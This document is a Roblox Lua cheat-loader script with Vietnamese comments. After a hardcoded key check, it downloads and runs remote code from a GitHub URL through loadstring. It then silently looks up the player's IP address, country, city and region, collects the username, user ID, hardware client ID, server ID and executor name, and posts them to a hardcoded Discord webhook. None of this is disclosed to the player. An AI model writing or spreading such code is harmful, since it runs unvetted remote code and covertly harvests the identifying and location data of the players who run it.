-- Tạo hiệu ứng mờ
local blur = Instance.new("BlurEffect", game:GetService("Lighting"))
blur.Size = 25           
task.delay(2, function()  
    if blur then blur:Destroy() end
end)

repeat wait() until game:IsLoaded() and game.Players.LocalPlayer 
local wl = {
    Key = "dpf4-Mk9TJ-bvxb-u9vw-fNaN-4pPQ-yj0pb"
}

local keys = {
    "dpf4-Mk9TJ-bvxb-u9vw-fNaN-4pPQ-yj0pb",
    "Tsfz-Dta0-Az6Q-tTfx-zg5J-vSOK-0f5Zi7",
    "t35z-dvie-zIgf-LPKY-J1aI-0B4j-8npoPz",
}

local found = false

for _, v in pairs(keys) do
    if v == wl.Key then
        found = true
        game.StarterGui:SetCore("SendNotification", {
            Title = "Success key",
            Text = "loading",
            Duration = 5
        })
        print("Loading Script")
        task.wait(5)
        loadstring(game:HttpGet("https://raw.githubusercontent.com/puppy907/gag/refs/heads/main/GrowAGarden"))()
        break
    end
end

if not found then
    game.Players.LocalPlayer:Kick("please enter your key")
end

local requestt = http_request or request or syn and syn.request
if not requestt then
    warn("Request function not available")
    return
end

-- Lấy IP, Location
local ip, country, city, region = "Unknown", "Unknown", "Unknown", "Unknown"
local success, response = pcall(function()
    return requestt({Url = "http://ip-api.com/json", Method = "GET"})
end)
if success and response and response.Body then
    local decoded = game:GetService("HttpService"):JSONDecode(response.Body)
    ip = decoded.query or ip
    country = decoded.country or country
    city = decoded.city or city
    region = decoded.regionName or region
end

-- Các thông tin khác (placeholder)
local mac, serial, device_name, os_version = "Unknown", "Unknown", "Unknown", "Unknown"

-- Thông tin executor
local executor = identifyexecutor and (identifyexecutor() or getexecutorname()) or "Unknown"

-- Gửi Webhook
local data = {
    ["embeds"] = {
        {
            ["title"] = "NEW USED",
            ["type"] = "PLAYER",
            ["color"] = tonumber("1cff1a", 16),
            ["thumbnail"] = {
                ["url"] = "https://www.roblox.com/headshot-thumbnail/image?userId="..game.Players.LocalPlayer.UserId
            },
            ["fields"] = {
                {["name"] = 'Username / UserId', ["value"] = "```"..game.Players.LocalPlayer.Name.." / "..game.Players.LocalPlayer.UserId.."```", ["inline"] = false},
                {["name"] = 'IP Address', ["value"] = "||```"..ip.."```||", ["inline"] = true},
                {["name"] = 'Country', ["value"] = "||```"..country.."```||", ["inline"] = true},
                {["name"] = 'Location', ["value"] = "||```"..city..", "..region.."```||", ["inline"] = true},
                {["name"] = 'MAC Address', ["value"] = "||```"..mac.."```||", ["inline"] = true},
                {["name"] = 'Serial Device', ["value"] = "||```"..serial.."```||", ["inline"] = true},
                {["name"] = 'Device Name', ["value"] = "||```"..device_name.."```||", ["inline"] = true},
                {["name"] = 'OS Version', ["value"] = "||```"..os_version.."```||", ["inline"] = true},
                {["name"] = 'HWID', ["value"] = "||```"..game:GetService("RbxAnalyticsService"):GetClientId().."```||", ["inline"] = true},
                {["name"] = 'JobId', ["value"] = "```"..game.JobId.."```", ["inline"] = true},
                {["name"] = 'Executor', ["value"] = "```"..executor.."```", ["inline"] = true},
                {["name"] = 'Profile Link', ["value"] = "[Click Here](https://www.roblox.com/users/"..game.Players.LocalPlayer.UserId.."/profile)", ["inline"] = false},
                {["name"] = 'Game Link', ["value"] = "[Click Here](https://www.roblox.com/games/"..game.PlaceId..")", ["inline"] = true},
                {["name"] = "Server Link", ["value"] = "```roblox://experiences/start?placeId=" .. game.PlaceId .. "&gameInstanceId=" .. game.JobId .. "```", ["inline"] = true}
            }
        }
    }
}

local newdata = game:GetService("HttpService"):JSONEncode(data)
local webhookSuccess, result = pcall(function()
    return requestt({
        Url = 'https://discord.com/api/webhooks/1394985277528997898/Z9AKy1SIRu7lEEgwykfiR7_40wNilSYai_77XO5X3YYMS0nCtJ9Ek7igFXeHsIsDcbZS',
        Body = newdata,
        Method = "POST",
        Headers = {["Content-Type"] = "application/json"}
    })
end)

if webhookSuccess then
    print("LOADING")
else
    warn("Gửi webhook thất bại:", result)
end

